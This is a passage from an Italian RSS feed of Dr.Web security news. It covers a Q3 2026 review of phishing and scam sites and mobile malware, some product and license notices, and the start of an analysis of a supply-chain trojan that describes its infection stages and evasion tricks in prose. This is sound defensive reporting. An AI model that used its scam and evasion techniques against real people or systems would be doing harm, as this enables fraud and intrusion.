    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/34_scam_energ5.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/34_scam_energ5.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Il sito invita a richiedere nuovamente la chiamata dello specialista, o a chiamare direttamente "l'operatore di turno"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Quando si fa clic sul primo pulsante, il timer "dell'attesa della richiesta" riappare, e il processo si ripete. Al clic sul secondo pulsante, vengono visualizzati i numeri di telefono della "linea di assistenza dedicata", i quali, in realtà, appartengono ai truffatori. Lo scopo di questo schema è quello di aumentare il panico nella potenziale vittima dopo un'attesa imposta e con un maggiore successo indurla a chiamare uno dei numeri forniti per cercare di impedire la possibile fuga dei dati personali e la perdita dell'accesso al portale dei servizi statali Gosuslugi. Inoltre, i malintenzionati "prendono due piccioni con una fava", rubando direttamente anche i relativi dati di accesso all'area personale dell'utente sul sito del fornitore dei servizi di pubblica utilità.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/35_scam_energ6.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/35_scam_energ6.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Per velocizzare la risoluzione del "problema", alla potenziale vittima vengono forniti i numeri di telefono della "linea di supporto dedicata"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Gli analisti internet Doctor Web, durante i tre mesi passati, hanno continuato a individuare nuovi siti truffa che promettono gli svariati bonus e sussidi. I cybercriminali spacciavano alcuni di essi per il sito ufficiale della piattaforma statale russa "Lavoro in Russia" &lt;em&gt;(trudvsem.ru)&lt;/em&gt;, sulla quale vengono pubblicati offerte di lavoro e CV e la quale aiuta nella ricerca di occupazione. Le false risorse internet informavano che i cittadini precedentemente registrati sul portale ufficiale presumibilmente potrebbero ricevere un bonus aggiuntivo dal Centro per l'impiego. In alcuni casi, l'importo del bonus promesso raggiungerebbe decine di migliaia di rubli.&lt;/p&gt;

&lt;p&gt;Per "ricevere" il denaro, agli utenti veniva suggerito di richiedere una carta bancaria separata del sistema di pagamento MIR, sulla quale in seguito presumibilmente sarebbe accreditato il "sussidio". In seguito, dovevano, inoltre, attivare la carta effettuando un acquisto. Per l'ottenimento della carta, sui siti fraudolenti era predisposto un modulo per l'inserimento dei seguenti dati personali: nome, cognome, numero di telefono e indirizzo email:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/36_fake_trud1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/36_fake_trud1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sito fraudolento che imita la piattaforma "Lavoro in Russia" promette un "bonus aggiuntivo dal Centro per l'impiego" a condizione di ottenimento di una nuova carta bancaria&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dopo aver compilato il modulo e cliccato sul pulsante "Richiedi carta MIR", i visitatori venivano reindirizzati al sito web legittimo di una banca, dove effettivamente veniva offerta loro la possibilità di richiedere il rilascio di una nuova carta. Tuttavia, tali richieste, in realtà, non avevano alcuna attinenza con il presunto "accredito" del sussidio promesso dai truffatori. I truffatori inducevano con l'inganno le potenziali vittime a richiedere carte bancarie, al fine di ricevere nell'ambito di programmi di partnership con istituti di credito una ricompensa per ciascun cliente acquisito con successo. In fin dei conti, gli utenti non ricevevano alcun pagamento dal Centro per l'impiego. Per di più, i cybercriminali in seguito potrebbero utilizzare i dati personali raccolti tramite i falsi siti che imitano la piattaforma "Lavoro in Russia" in altri schemi fraudolenti o venderli sul mercato nero.&lt;/p&gt;

&lt;p&gt;I dati riservati di accesso agli account di online banking, tra cui nomi utente, password e dettagli di carte bancarie, rimangono un obiettivo desiderato per i cybercriminali. Nel II trimestre i nostri esperti hanno registrato nuovi siti di phishing creati allo scopo di furto di tali informazioni. Alcuni di questi siti imitavano il portale internet di un istituto di credito russo e promettevano regali nell'ambito di una "promozione su larga scala dedicata all'anniversario" dell'azienda. Gli utenti presumibilmente potrebbero ricevere un bonus garantito: da 5mila rubli al raddoppio dell'intera somma di denaro presente sul conto:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/37_fake_bank_gift1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/37_fake_bank_gift1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un falso sito di banca promette regali in onore dell'anniversario dell'istituto di credito&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;La potenziale vittima veniva invitata a partecipare a un breve sondaggio. Dopo aver risposto alle domande, l'utente presumibilmente avrebbe diritto a un "premio garantito":&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/38_fake_bank_gift2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/38_fake_bank_gift2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Il sito di phishing ringrazia l'utente per le sue risposte e lo informa che il suo account è "pronto a partecipare alla promozione". Per "scoprire il premio garantito", la potenziale vittima dovrebbe cliccare sul pulsante "Ricevi il premio" (sullo screenshot riportato si vede un errore di battitura fatto dai truffatori)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dopo che l'utente fa clic sul pulsante di "ricezione" del premio, il sito visualizza un modulo per l'inserimento del nome e cognome, del numero di cellulare e del numero di carta bancaria:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/39_fake_bank_gift3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/39_fake_bank_gift3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Il sito informa che l'utente presumibilmente avrebbe ricevuto in regalo il raddoppio della somma di denaro presente sul conto e che, per "ricevere" il premio, è necessario inserire determinati dati personali&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dopo l'inserimento dei dati, il sito chiede di indicare il codice di verifica via SMS che sarebbe necessario "per accreditare il denaro sul conto". In realtà, questo è il codice per confermare l'accesso all'online banking della vittima, che viene eseguito dai truffatori con l'utilizzo dei dati carpiti nella fase precedente. Se la vittima procedeva a inserire questo codice, i malintenzionati ottenevano l'accesso ai suoi conti bancari e alle sue carte e potevano rubare il suo denaro.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/40_fake_bank_gift4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/40_fake_bank_gift4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;All'utente viene suggerito di inserire il codice di verifica via SMS "per l'accredito del denaro sul conto"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Continuano a essere una minaccia attuale le false piattaforme di comunicazione e incontri online, tramite le quali i malintenzionati cercano di rubare le informazioni personali e i soldi degli utenti. Durante il III trimestre, gli analisti internet Doctor Web hanno individuato un gran numero di tali siti. In uno schema di truffa diffuso, i truffatori inducono con l'inganno le potenziali vittime a pagare un abbonamento premium, che presumibilmente attiverebbe il loro account e sbloccherebbe le complete funzionalità del servizio web, inclusa la possibilità di inviare messaggi. Il pagamento richiesto non è una tantum: una condizione obbligatoria per "l'accesso" alle chat è l'accettazione del rinnovo automatico del servizio. Cercando di ottenere il consenso a un pagamento ricorrente, i malintenzionati contano su quello che le vittime si dimenticheranno dell'abbonamento o, per un motivo o per l'altro, non potranno annullarlo.&lt;/p&gt;

&lt;p&gt;Nell'ambito dello schema fraudolento, le potenziali vittime, attraverso una serie di reindirizzamenti (ad esempio, durante la visita di altre risorse internet), potrebbero arrivare sui siti intermedi che pubblicizzano uno specifico servizio di incontri online. I visitatori vengono invitati a partecipare a un sondaggio che sarebbe volto a valutare la loro "compatibilità" con i/le potenziali partner, dopodiché a loro diventa disponibile un modulo di registrazione. Contiene campi per l'inserimento di un nome utente, una password e un indirizzo di posta elettronica. Quindi avviene il reindirizzamento al sito della presunta "piattaforma" di incontri online.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/41_fake_date1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/41_fake_date1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sito dalla catena truffaldina "testa" la compatibilità di una potenziale vittima con altri utenti&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Quasi subito gli utenti iniziano a ricevere i messaggi da partecipanti "interessati", i quali, in realtà, sono programmati e non provengono da persone reali. Tuttavia, non è possibile rispondere a questi messaggi — per "continuare la conversazione", il sito chiede di attivare l'account pagando l'accesso premium e accettando il rinnovo automatico dell'abbonamento ogni 30 giorni:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/42_fake_date2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/42_fake_date2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Durante il pagamento "dell'abbonamento premium", tali siti web possono visualizzare un modulo non protetto per l'inserimento dei dati della carta bancaria: del suo numero, della data di scadenza e persino del codice di sicurezza di tre cifre. Il modulo non è collegato ai gateway di pagamento affidabili, pertanto gli utenti rischiano non solo di iscriversi a un servizio costoso, ma anche di perdere tutti i soldi presenti sulla propria carta trasferendo informazioni su di essa a persone terze sconosciute.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/43_fake_date3_pay_subscr.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/43_fake_date3_pay_subscr.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;I dati della carta bancaria vengono richiesti tramite un modulo di inserimento non protetto&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Se gli utenti tentano di annullare l'abbonamento o richiedere il rimborso, i siti richiedono nuovamente i dati della carta bancaria (ad esempio, la data di scadenza e parte del numero della carta). Anche questo avviene al di fuori del contorno dei gateway di pagamento protetti, creando ulteriori rischi di fuga dei dati riservati e di furto del denaro.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/44_fake_date4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/44_fake_date4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Alla richiesta di cancellare l'abbonamento a pagamento, il sito chiede di indicare le prime 6 cifre e le ultime 4 cifre del numero della carta bancaria, nonché la sua data di scadenza&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb-av.it/dangerous_urls/"&gt;Scopri di più sui siti sconsigliati da Dr.Web&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Software malevoli e indesiderati per dispositivi mobili&lt;/h3&gt;

&lt;p&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel III trimestre 2026 i programmi malevoli più attivi sono stati i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel III trimestre 2026 i programmi malevoli più attivi sono stati i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.60.origin&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.61.origin&lt;/b&gt; — hanno rappresentato quasi un quarto di tutti i rilevamenti dei software malevoli. Rispetto al II trimestre, è aumentato il numero di attacchi dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Ed è continuata la tendenza alla diminuzione dell'attività delle applicazioni trojan pubblicitarie &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;I programmi indesiderati più diffusi di nuovo sono stati i falsi antivirus &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, che suggeriscono di acquistare la versione completa per "neutralizzare" le minacce presumibilmente trovate. Tra i software pubblicitari, i rilevamenti più frequenti sono stati quelli delle applicazioni con i moduli incorporati &lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;, che visualizzano notifiche pubblicitarie, nonché dei programmi &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. Questi ultimi vengono distribuiti sotto le finte spoglie di software con cheat per giochi, ma la loro unica funzione è quella di caricare siti con annunci pubblicitari.&lt;/p&gt;

&lt;p&gt;Le applicazioni in cui tramite gli strumenti hacker per il modding NP Manager è aggiunto un codice spazzatura (vengono rilevate come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;) sono rimaste i software potenzialmente pericolosi più frequenti. Gli autori di virus continuano a utilizzare tale modificazione per proteggere i programmi malevoli, in particolare i trojan bancari, dal rilevamento da parte degli antivirus. Come in precedenza, sono diffuse anche altre mod, create con l'utilizzo di NP Manager e rilevate da Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.NPMod&amp;lng=it"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;. Ad esempio, in esse potrebbe essere utilizzato l'offuscamento del codice — anche questo per la protezione dal rilevamento e dall'analisi. Tra i software potenzialmente pericolosi più frequenti nel III trimestre, erano anche i programmi modificati tramite l'utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Questo strumento scarica da internet script che potenzialmente potrebbero essere malevoli.&lt;/p&gt;

&lt;p&gt;Nei 3 mesi passati, gli analisti di virus dell'azienda Doctor Web hanno rilevato sullo store di app Google Play oltre 50 applicazioni malevole. Tra queste erano decine di trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che abbonano le vittime a servizi a pagamento. I nostri specialisti hanno scoperto che alcune nuove versioni di questa famiglia di applicazioni malevole hanno ricevuto una nuova funzionalità che consente ad esse di sfruttare i dispositivi infetti come nodi di uscita di una botnet proxy per il reindirizzamento del traffico internet degli attaccanti. Inoltre, su Google Play venivano distribuiti ulteriori trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che i cybercriminali utilizzano in vari schemi fraudolenti.&lt;/p&gt;

&lt;p&gt;Eventi più importanti relativi alla sicurezza "mobile" in III trimestre&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;Si osservava un'alta attività dei programmi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, che consentono di reindirizzare il traffico di rete dei malintenzionati attraverso i dispositivi infettati.&lt;/li&gt;
    &lt;li&gt;È aumentato il numero di attacchi da parte dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
    &lt;li&gt;È continuato il calo dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
    &lt;li&gt;Gli autori di virus hanno aggiunto alle applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; una funzionalità che consente di trasformare i dispositivi infettati in nodi di uscita di una botnet proxy.&lt;/li&gt;
    &lt;li&gt;Tramite lo store di app Google Play di nuovo venivano distribuite applicazioni malevole.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel III trimestre 2026 leggete la nostra &lt;a href="https://news.drweb-av.it/show/review/?i=15305" target="_blank"&gt;panoramica&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15298&amp;lng=it</guid><title>Si torna a scuola con Dr.Web! Vi abbiamo preparato il 15% di sconto e un mese aggiuntivo di protezione dei computer di casa</title><link>https://news.drweb-av.it/show/?i=15298&amp;lng=it&amp;c=5</link><pubDate>Wed, 26 Aug 2026 14:54:08 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Prima dell'inizio del nuovo anno scolastico Doctor Web lancia una promozione speciale "Si torna a scuola" che vi aiuterà a proteggere il mondo digitale dei vostri figli.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Dal 26 agosto al 2 settembre&lt;/strong&gt; sono in vigore prezzi speciali per la protezione dei computer di casa. Acquistando una nuova licenza annuale &lt;strong&gt;Dr.Web Security Space&lt;/strong&gt;, ricevete uno sconto garantito del 15% e un mese di protezione aggiuntivo. Vi basta scegliere il numero di dispositivi da proteggere:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;2 PC,&lt;/li&gt;&lt;li&gt;3 PC,&lt;/li&gt;&lt;li&gt;4 PC.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;a class="btn" href="https://www.drweb-av.it/landing/school2026?utm_source=drweb&amp;amp;utm_medium=news&amp;amp;utm_campaign=school2026"&gt;Prendi lo sconto +1 mese&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Dr.Web Security Space proteggerà i computer e i notebook dei vostri figli da ogni tipo di minaccia internet, li aiuterà a evitare le distrazioni dai compiti dovute ai contenuti di intrattenimento e li metterà in guardia dai link pericolosi e dalle truffe.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Prendetevi cura della sicurezza del bambino oggi stesso — lasciate che l'anno scolastico proceda serenamente e in modo produttivo insieme a Dr.Web.&lt;/p&gt;&lt;p&gt;&lt;a href="https://f2.drweb.com/get+meta+file/?k=0ac5b75917b46c7d04adb4101643320f&amp;amp;sdl=it&amp;amp;sdf=t"&gt;Condizioni complete della promozione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15291&amp;lng=it</guid><title>Aggiornamento del server di gestione centralizzata per Dr.Web Enterprise Security Suite e Dr.Web Industrial</title><link>https://news.drweb-av.it/show/?i=15291&amp;lng=it&amp;c=5</link><pubDate>Thu, 23 Jul 2026 09:54:20 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;L'azienda Doctor Web sta per rilasciare un aggiornamento per il server incluso in Dr.Web Enterprise Security Suite e Dr.Web Industrial versione 13.0.1.202606110. La nuova versione sarà disponibile per il download a partire dal 27 luglio 2026 tramite l'interfaccia web della console di gestione.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Che cosa fornisce il nuovo aggiornamento&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;In primo luogo, la release è volta ad aumentare la stabilità di funzionamento del Pannello di controllo e correggere una serie di errori individuati nella versione precedente. In particolare, sono stati risolti i problemi della visualizzazione degli elementi figlio durante il filtraggio nell'albero della rete antivirus, sono stati corretti gli errori nell'invio degli avvisi ad amministratori e nella generazione dei report. L'elenco completo delle modifiche è disponibile in &lt;a href="https://news.drweb-av.it/changelog/?lng=it"&gt;Changelog&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Influenza sugli agent (tra l'altro, anche in Dr.Web Industrial)&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;L'aggiornamento del server non influisce sul funzionamento degli agent sui nodi protetti. Il processo di aggiornamento del componente server non richiede il riavvio o la riconfigurazione del software agent - essi continueranno a funzionare regolarmente. Per gli ambienti industriali, dove viene utilizzato Dr.Web Industrial, questo significa l'assenza di qualsiasi cambiamento nel funzionamento degli agent, poiché tutte le correzioni riguardano esclusivamente la parte server e l'interfaccia di gestione.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Importante:&lt;/strong&gt; Il Server Dr.Web verrà automaticamente riavviato durante l'installazione degli aggiornamenti. Vi consigliamo di programmare la procedura in anticipo per un momento di minore carico.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15284&amp;lng=it</guid><title>Aggiornamento del componente antispam in Dr.Web Enterprise Security Suite e in Dr.Web in abbonamento</title><link>https://news.drweb-av.it/show/?i=15284&amp;lng=it&amp;c=5</link><pubDate>Wed, 15 Jul 2026 17:04:40 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;L'azienda Doctor Web rilascia un aggiornamento del modulo antispam 1.1.2.202604160 incluso in Dr.Web Enterprise Security Suite e in Dr.Web in abbonamento. Sarà possibile scaricarlo a partire dal 20 luglio 2026.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Il modulo controlla in tempo reale il traffico email e analizza gli elementi dei messaggi di posta elettronica: intestazione, corpo, collegamenti ipertestuali e allegati. Il funzionamento del componente è bilanciato e non rallenta le prestazioni del client di posta.&lt;/p&gt;&lt;p&gt;Nella nuova versione sono stati migliorati il rilevamento dello spam e l'analisi dei link, nonché sono state apportate modifiche interne. Precedentemente è stato rilasciato un &lt;a href="https://news.drweb-av.it/show/?lng=it&amp;amp;i=14979"&gt;grande aggiornamento &lt;/a&gt;che ha migliorato l'efficacia del riconoscimento e del filtraggio del traffico indesiderato.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Richiamiamo l'attenzione degli utenti di Windows XP.&lt;/strong&gt; Se è attivata solo l'opzione di aggiornamento dei database dei virus, il plugin Dr.Web per Microsoft Outlook non funzionerà correttamente: tutte le email in arrivo verranno rilevate come spam. Come controllarlo: nelle impostazioni del programma selezionate la voce "Aggiornamento", quindi fate clic su "Impostazioni avanzate" e andate alla sezione "Componenti da aggiornare".&lt;/p&gt;&lt;p&gt;Consigliamo agli utenti di questo sistema operativo di aggiornarlo alle versioni successive, o di attivare nelle impostazioni l'aggiornamento di tutti i moduli del programma e non solo dei database dei virus.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15285&amp;lng=it</guid><title>Aggiornato il Contratto di licenza per i prodotti software Dr.Web</title><link>https://news.drweb-av.it/show/?i=15285&amp;lng=it&amp;c=5</link><pubDate>Wed, 15 Jul 2026 14:43:47 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;L'azienda Doctor Web ha aggiornato il Contratto di licenza per i prodotti software Dr.Web. Il documento è consultabile al link &lt;a href="https://license.drweb.com/agreement/."&gt;https://license.drweb.com/agreement/.&lt;/a&gt;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Elenco delle modifiche:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;il testo è strutturato in sezioni tematiche per facilitare la navigazione;&lt;/li&gt;&lt;li&gt;sono fornite le definizioni dei termini per una migliore comprensione del testo del documento e per prevenire interpretazioni errate;&lt;/li&gt;&lt;li&gt;è precisata la differenza tra l'uso autorizzato dei prodotti software Dr.Web e quello senza licenza;&lt;/li&gt;&lt;li&gt;sono fornite chiarimenti riguardanti le domande frequenti degli utenti: su quali dispositivi può essere utilizzata la licenza acquistata, se è obbligatorio che il dispositivo protetto sia di proprietà dell'utente, e altre domande simili.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Usando i prodotti software Dr.Web dopo l'entrata in vigore della nuova versione del Contratto di licenza, voi confermate di accettare integralmente le nuove condizioni. Se non accettate le modifiche, siete tenuti a rimuovere il software Dr.Web dai propri dispositivi.&lt;/p&gt;&lt;p&gt;Richiamiamo la vostra attenzione sul fatto che questo documento vale per tutti i prodotti software della famiglia Dr.Web ad eccezione di Dr.Web FixIt! e Dr.Web vxCube. Queste due soluzioni hanno i propri Contratti di licenza.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15276&amp;lng=it</guid><title>L'obiettivo sono gli sviluppatori. Un nuovo trojan attacca le catene di fornitura e causa danni combinati ai PC infetti</title><link>https://news.drweb-av.it/show/?i=15276&amp;lng=it&amp;c=5</link><pubDate>Fri, 10 Jul 2026 05:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Gli specialisti del laboratorio antivirus hanno analizzato un nuovo programma trojan. È una minaccia di tipo supply chain attack, cioè attacco alle catene di fornitura. Un tratto distintivo di questo malware è il suo focus sui progetti creati nel linguaggio di programmazione C++ e C#. Un'altra caratteristica è la sua elevata pericolosità. Il trojan unisce in sé diversi fattori distruttivi svolgendo contemporaneamente più funzioni: quelle di stealer, clipper, backdoor, cryptominer e fonte di infezione di file.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;I primi casi di diffusione del trojan sono stati registrati nell'ultimo trimestre del 2025, da allora in poi esso viene costantemente modificato dai relativi sviluppatori. Viene distribuito principalmente su internet tramite file infetti .exe e python. Il processo di infezione è a più fasi, di seguito analizziamo lo svolgimento di ciascuna fase e i rispettivi obiettivi.&lt;/p&gt;&lt;h3&gt;Fase 1. Trojan.DownLoader49.35384&lt;/h3&gt;&lt;p&gt;Gli specialisti Doctor Web hanno rilevato numerose applicazioni legittime infette con una struttura simile. Un oggetto globale è aggiunto al file eseguibile originale, e l'esecuzione dell'applicazione trojanizzata inizia con l'ottenimento dell'accesso alle API di sistema tramite il metodo PEB walking. Quindi la funzione standard initterm scorre la tabella dei puntatori a funzione e li inizializza, dove una di tali funzioni è malevola e lancia il comando PowerShell. In alcune versioni del trojan questo payload è conservato in forma crittografata.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Avvio tramite initterm&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Il comando PowerShell scarica ed esegue il file malevolo&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, il che significa che viene lanciata la seconda fase.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Comando PowerShell malevolo&lt;/i&gt;&lt;/p&gt;&lt;p&gt;In aggiunta ai file eseguibili, sono stati rilevati file in linguaggio Python (&lt;strong&gt;Python.Downloader.255&lt;/strong&gt;). In questi ultimi il codice malevolo era cifrato tramite il meccanismo di crittografia simmetrica Fernet. È celato tramite un semplice offuscamento — una sequenza di spazi nella prima riga. Anche in questo caso l'esecuzione avviene a più 